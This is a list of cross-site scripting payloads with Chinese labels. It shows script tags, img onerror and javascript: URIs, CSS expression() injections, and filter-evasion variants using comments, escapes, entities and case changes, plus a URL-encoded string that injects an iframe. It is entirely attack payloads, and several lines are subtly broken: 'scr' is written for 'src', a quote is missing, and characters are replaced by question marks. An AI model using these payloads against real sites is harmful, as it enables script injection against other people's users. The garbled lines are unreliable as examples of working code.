<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["